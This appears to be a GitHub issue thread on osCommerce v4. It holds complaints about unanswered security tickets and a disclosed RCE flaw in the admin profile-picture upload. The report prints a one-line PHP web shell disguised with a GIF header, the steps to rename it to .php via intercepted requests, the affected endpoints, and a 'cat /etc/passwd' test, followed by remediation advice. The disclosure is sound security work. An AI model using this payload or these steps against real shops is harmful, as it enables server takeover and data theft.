Security Issues in osCommerce v4 #62
Comments
|
Dear @osCommerce team, @JanZ, @haraldpdl, @markkevans, @gburton, @acidvertigo, @Gergely, @tgely, @osc2nuke, @scottcwilson, @nickw108, @foxp2, @gadlol, @vakondweb, @anthonyjhicks, @mommaroodles, @ynechitajlo, @pan-oscom, @vladmalyshev: Have you seen this security ticket? |
|
Ten months later... I take my consequences and switch to a better maintained shop system. |
|
@T-Qualizer Microweber is being actively developed |
|
@gburton whats happened - I thought you were taking osCommerce to new heights?
I left osCommerce years ago when I could foresee the direction in which it was going and years later after revisiting it out of curiosity - I cant say I'm surprised to see it has been taken over by Holbi. osCommerce has been effectively dead for a number of years now. |
RCE via file upload bypass
Hello team, I have identified a security vulnerability while editing the administrator's profile picture. By manipulating the file extension from 'shell.gif' to 'shell.php,' as outlined in the request below, the application erroneously processed the file with the altered extension.
Steps to Reproduce
To exploit this vulnerability, I initiated the upload process of a malicious GIF file by selecting 'edit' to upload the file. The request was intercepted using Burp Suite, as depicted in the image below. Throughout this process, I modified the file extension from 'shell.gif' to 'shell.php.' The content of this file included the following payload:
GIF89a;<?php system($_GET['cmd']); ?>The provided payload is a straightforward yet potent PHP script intended to execute system commands based on the 'cmd' parameter in the GET request. The initial 'GIF89a;' serves as a GIF file header, deceiving the server into treating the file as a harmless image. This technique is a classic illustration of circumventing upload filters by exploiting the server's file-handling logic, thereby enabling the execution of arbitrary commands.
After completing the upload, I observed that the image appeared to load successfully, but the file extension still displayed as 'shell.gif.' However, upon clicking 'Update' and re-evaluating the request, I discovered that the 'avatar' parameter contained the file 'shell.gif.' By altering this to 'shell.php,' the upload was successfully executed, and the application accepted the file.
Upon accessing the 'shell.php' file in its directory, I achieved Remote Code Execution (RCE) successfully. For instance, executing the command 'cat /etc/passwd' demonstrated the ability to run server commands and potentially access sensitive data.
Affected Pages
POST /admin/upload
POST /admin/adminaccount/saveaccount
Images
Remediation
File Type Verification:
Implement robust file type verification during the upload process. Check the file header and content to ensure they match the expected file type (e.g., GIF). This helps prevent attackers from manipulating file extensions and uploading malicious content.
Use Whitelisting:
Allow only specific file extensions that are necessary for the application's functionality. Whitelisting acceptable file types can reduce the risk of uploading malicious files.
File Content Inspection:
Conduct thorough inspection of the file's content, especially if it claims to be of a certain type. Analyze the structure of the file and verify that it adheres to the expected format for the specified file type.
The text was updated successfully, but these errors were encountered: